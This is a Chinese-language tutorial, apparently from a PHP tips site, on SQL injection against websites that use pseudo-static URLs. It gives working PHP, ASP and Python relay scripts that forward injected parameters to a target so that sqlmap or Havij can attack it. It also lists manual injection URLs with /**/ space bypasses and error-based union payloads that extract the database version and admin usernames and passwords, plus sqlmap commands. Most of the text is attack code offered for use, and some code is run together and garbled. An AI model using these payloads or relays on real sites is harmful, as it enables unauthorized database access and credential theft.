本文实例讲述了PHP针对伪静态的注入。分享给大家供大家参考,具体如下:
一:中转注入法
1.通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了http://www.xxx.com/news.php/id/1.html
2.测试步骤:
中转注入的php代码:inject.php
<?phpset_time_limit(0);$id=$_GET["id"];$id=str_replace(” “,”%20″,$id);$id=str_replace(“=”,”%3D”,$id);//$url = "http://www.xxx.com/news.php/id/$id.html";$url = "http://www.xxx.com/news.php/id/$id.html";//echo $url;$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "$url");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);$output = curl_exec($ch);curl_close($ch);print_r($output);?>
3.本地环境搭建PHP,然后访问http://127.0.0.1/inject.php?id=1
通过sqlmap或者havj可以跑注入漏洞。
附录ASP中转代码:
<%JmdcwName=request("id")JmStr=JmdcwNameJmStr=URLEncoding(JmStr)JMUrl="http://192.168.235.7:8808/ad/blog/" //实际上要请求的网址JMUrl=JMUrl & JmStr&".html" //拼接urlresponse.write JMUrl&JmStr //我这里故意输出url来看"JmRef="http://127.0.0.1/6kbbs/bank.asp"JmCok=""JmCok=replace(JmCok,chr(32),"%20") JmStr=URLEncoding(JmStr) response.write PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串,cookie,referer字段Function PostData(PostUrl,PostStr,PostCok,PostRef) Dim HttpSet Http = Server.CreateObject("msxml2.serverXMLHTTP")With Http.Open "GET",PostUrl,False.Send ()PostData = .ResponseBodyEnd WithSet Http = NothingPostData =bytes2BSTR(PostData)End FunctionFunction bytes2BSTR(vIn) //处理返回的信息Dim strReturnDim I, ThisCharCode, NextCharCodestrReturn = ""For I = 1 To LenB(vIn)ThisCharCode = AscB(MidB(vIn, I, 1))If ThisCharCode < &H80 ThenstrReturn = strReturn & Chr(ThisCharCode)ElseNextCharCode = AscB(MidB(vIn, I + 1, 1))strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))I = I + 1End IfNextbytes2BSTR = strReturnEnd FunctionFunction URLEncoding(vstrin) //发包前对参数的url编码一下strReturn=""Dim i"vstrin=replace(vstrin,"%","%25") "增加转换搜索字符,"vstrin=Replace(vstrin,chr(32),"%20") "转换空格,如果网站过滤了空格,尝试用/**/来代替%20"vstrin=Replace(vstrin,chr(43),"%2B") "JMDCW增加转换+字符vstrin=Replace(vstrin,chr(32),"/**/") "在此增加要过滤的代码 //这里很关键,方便啊,把空格自动换成/**/,后面会说到的For i=1 To Len(vstrin)ThisChr=Mid(vstrin,i,1)if Abs(Asc(ThisChr))< &HFF ThenstrReturn=strReturn & ThisChrElseInnerCode=Asc(ThisChr)If InnerCode<0 ThenInnerCode=InnerCode + &H10000End IfHight1=(InnerCode And &HFF00) &HFFLow1=InnerCode And &HFFstrReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)End ifNextURLEncoding=strReturnEnd Function%>
二、手工注入法
1.http://www.xxx.com/play/Diablo.htmlhttp://www.xxx.com/down/html/?772.html
2.测试注入:
http://www.xxx.com/down/html/?772′.htmlhttp://www.xxx.com /play/Diablo".htmlhttp://www.xxx.com/play/Diablo"/**/and/**/1="1 /*.htmlhttp://www.xxx.com/play/Diablo"/**/and/**/1="2 /*.htmlhttp://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出错
3.看页面是否存在差异,相同则不存在,不同存在注入。
4.联合查询:
http://www.xxx.com/play/diablo" and 1=2 union select 1,2… frominformation_schema.columns where 1="1.htmlhttp://www.xxx.com/page/html/?56"/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
手工注入法(二)
http://www.xxx.net/news/html/?410.htmlhttp://www.xxx.net/news/html/?410"union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where"1"="1.html
注:
伪静态的注入和URL的普通GET注入不太相同
。普通url的get注入的%20,%23,+等都可以用;但是伪静态不行,会被直接传递到到url中,所以用/**/这个注释符号表示空格。
三、SQLmap方法
在sqlmap中伪静态哪儿存在注入点就加*http://www.cunlide.com/id1/1/id2/2python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″http://www.xxx.com/news/class/?103.htmpython sqlmap.py -u “http://www.xxx.com/news/class/?103*.html”
四、python脚本方法
代码:
from BaseHTTPServer import *import urllib2class MyHTTPHandler(BaseHTTPRequestHandler): def do_GET(self): path=self.path path=path[path.find("id=")+3:] proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"}) opener = urllib2.build_opener(proxy_support) urllib2.install_opener(opener) url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/" try: response=urllib2.urlopen(url+path) html=response.read() except urllib2.URLError,e: html=e.read() self.wfile.write(html)server = HTTPServer(("", 8000), MyHTTPHandler)server.serve_forever()
更多关于PHP相关内容感兴趣的读者可查看本站专题:《php程序设计安全教程》、《php安全过滤技巧总结》、《PHP运算与运算符用法总结》、《PHP网络编程技巧总结》、《PHP基本语法入门教程》、《php面向对象程序设计入门教程》、《php字符串(string)用法总结》、《php+mysql数据库操作入门教程》及《php常见数据库操作技巧汇总》
希望本文所述对大家PHP程序设计有所帮助。